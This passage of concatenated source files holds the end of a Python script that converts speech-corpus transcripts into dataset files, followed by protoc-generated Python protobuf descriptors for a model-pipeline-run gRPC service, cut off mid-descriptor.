        save_converted_info(args, 'dev_converted', converted_info)
    ## read the eval_other script.
    script_name = 'eval_other.trn'
    if script_name in file_list:
        print("generate [{}]".format(script_name))
        fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path,
                                                                                                      script_name), info_data)
        save_files(args, 'eval_other', args.root, fileinfo, texts, transcripts)
        ## also emit the additional-unit variant
        if args.additional_output_unit is not None:
            save_files(args, 'add_eval_other', args.root, fileinfo, additional_texts, additional_transcripts)
        #save_wrong_script(args, 'eval_other_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
        save_converted_info(args, 'eval_other_converted', converted_info)
    ## read the eval_clean script.
    script_name = 'eval_clean.trn'
    if script_name in file_list:
        print("generate [{}]".format(script_name))
        fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path,
                                                                                                      script_name), info_data)
        save_files(args, 'eval_clean', args.root, fileinfo, texts, transcripts)
        ## also emit the additional-unit variant
        if args.additional_output_unit is not None:
            save_files(args, 'add_eval_clean', args.root, fileinfo, additional_texts, additional_transcripts)
        #save_wrong_script(args, 'eval_clean_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
        save_converted_info(args, 'eval_clean_converted', converted_info)
if __name__ == '__main__':
    # Parse CLI options, echo them for the run log, then convert.
    args = get_parser().parse_args()

    def _print_config(config):
        # Pretty-print the parsed namespace so runs are self-documenting.
        import pprint
        pprint.PrettyPrinter(indent=4).pprint(vars(config))

    _print_config(args)
    main(args)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto',
package='github.com.metaprov.modelaapi.services.modelpipelinerun.v1',
syntax='proto3',
serialized_options=b'Z:github.com/metaprov/modelaapi/services/modelpipelinerun/v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nQgithub.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto\x12:github.com.metaprov.modelaapi.services.modelpipelinerun.v1\x1a\x1cgoogle/api/annotations.proto\x1aHgithub.com/metaprov/modelaapi/pkg/apis/training/v1alpha1/generated.proto\"\xd6\x01\n\x1cListModelPipelineRunsRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12t\n\x06labels\x18\x03 \x03(\x0b\x32\x64.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"~\n\x1dListModelPipelineRunsResponse\x12]\n\x05items\x18\x01 \x01(\x0b\x32N.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRunList\"\x1a\n\x18ModelPipelineRunResponse\"y\n\x1d\x43reateModelPipelineRunRequest\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\" \n\x1e\x43reateModelPipelineRunResponse\"y\n\x1dUpdateModelPipelineRunRequest\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\" \n\x1eUpdateModelPipelineRunResponse\"=\n\x1aGetModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\"\x85\x01\n\x1bGetModelPipelineRunResponse\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\x12\x0c\n\x04yaml\x18\x02 \x01(\t\"@\n\x1d\x44\x65leteModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\" \n\x1e\x44\x65leteModelPipelineRunResponse\"a\n\x1e\x41pproveModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\r\n\x05stage\x18\x03 \x01(\t\x12\x0f\n\x07\x61\x63\x63ount\x18\x04 \x01(\t\"!\n\x1f\x41pproveModelPipelineRunResponse\"^\n\x1b\x44\x65nyModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 
\x01(\t\x12\r\n\x05stage\x18\x03 \x01(\t\x12\x0f\n\x07\x61\x63\x63ount\x18\x04 \x01(\t\"\x1e\n\x1c\x44\x65nyModelPipelineRunResponse\"\x1f\n\x1dPauseModelPipelineRunResponse\"?\n\x1cPauseModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\" \n\x1eResumeModelPipelineRunResponse\"@\n\x1dResumeModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\"\x1f\n\x1d\x41\x62ortModelPipelineRunResponse\"?\n\x1c\x41\x62ortModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t2\xeb\x14\n\x17ModelPipelineRunService\x12\xf5\x01\n\x15ListModelPipelineRuns\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse\"\'\x82\xd3\xe4\x93\x02!\x12\x1f/api/v1alpha1/modelpipelineruns\x12\xfb\x01\n\x16\x43reateModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\x1f/api/v1alpha1/modelpipelineruns:\x01*\x12\xf6\x01\n\x13GetModelPipelineRun\x12V.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest\x1aW.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse\".\x82\xd3\xe4\x93\x02(\x12&/api/v1alpha1/modelpipelineruns/{name}\x12\x9c\x02\n\x16UpdateModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse\"K\x82\xd3\xe4\x93\x02\x45\x1a@/api/v1alpha1/modelpipelineruns/{modelpipelinerun.metadata.name}:\x01*\x12\x93\x02\n\x16\x44\x65leteModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest\x1aZ.github.com.metaprov
.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse\"B\x82\xd3\xe4\x93\x02<*:/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}\x12\x9e\x02\n\x17\x41pproveModelPipelineRun\x12Z.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest\x1a[.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse\"J\x82\xd3\xe4\x93\x02\x44*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve\x12\x95\x02\n\x14\x44\x65nyModelPipelineRun\x12W.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest\x1aX.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse\"J\x82\xd3\xe4\x93\x02\x44*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve\x12\xf8\x01\n\x15\x41\x62ortModelPipelineRun\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\"/v1/modelpipelineruns/{name}:abort\x12\xf8\x01\n\x15PauseModelPipelineRun\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\"/v1/modelpipelineruns/{name}:pause\x12\xfc\x01\n\x16ResumeModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse\"+\x82\xd3\xe4\x93\x02%\"#/v1/modelpipelineruns/{name}:resumeB<Z:github.com/metaprov/modelaapi/services/modelpipelinerun/v1b\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,])
# Descriptor for the synthetic LabelsEntry message: proto3 expands a
# `map<string, string>` field into a nested key/value entry message.
# Generated by protoc — structure mirrors every other Descriptor below.
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY = _descriptor.Descriptor(
  name='LabelsEntry',
  full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,  # patched after all descriptors exist (see wiring section)
  create_key=_descriptor._internal_create_key,
  fields=[
    # map key: field number 1, proto type 9 (string)
    _descriptor.FieldDescriptor(
      name='key', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # map value: field number 2, proto type 9 (string)
    _descriptor.FieldDescriptor(
      name='value', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  # b'8\001' is the serialized `map_entry=true` MessageOptions flag.
  serialized_options=b'8\001',
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message within DESCRIPTOR's serialized_pb blob.
  serialized_start=419,
  serialized_end=464,
)
_LISTMODELPIPELINERUNSREQUEST = _descriptor.Descriptor(
name='ListModelPipelineRunsRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.labels', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=250,
serialized_end=464,
)
_LISTMODELPIPELINERUNSRESPONSE = _descriptor.Descriptor(
name='ListModelPipelineRunsResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse.items', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=466,
serialized_end=592,
)
_MODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=594,
serialized_end=620,
)
_CREATEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='CreateModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=622,
serialized_end=743,
)
_CREATEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='CreateModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=745,
serialized_end=777,
)
_UPDATEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='UpdateModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=779,
serialized_end=900,
)
_UPDATEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='UpdateModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=902,
serialized_end=934,
)
_GETMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='GetModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=936,
serialized_end=997,
)
_GETMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='GetModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yaml', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse.yaml', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1000,
serialized_end=1133,
)
_DELETEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='DeleteModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1135,
serialized_end=1199,
)
_DELETEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='DeleteModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1201,
serialized_end=1233,
)
_APPROVEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='ApproveModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stage', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.stage', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='account', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.account', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1235,
serialized_end=1332,
)
_APPROVEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ApproveModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1334,
serialized_end=1367,
)
_DENYMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='DenyModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stage', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.stage', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='account', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.account', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1369,
serialized_end=1463,
)
_DENYMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='DenyModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1465,
serialized_end=1495,
)
_PAUSEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='PauseModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1497,
serialized_end=1528,
)
_PAUSEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='PauseModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1530,
serialized_end=1593,
)
_RESUMEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ResumeModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1595,
serialized_end=1627,
)
_RESUMEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='ResumeModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
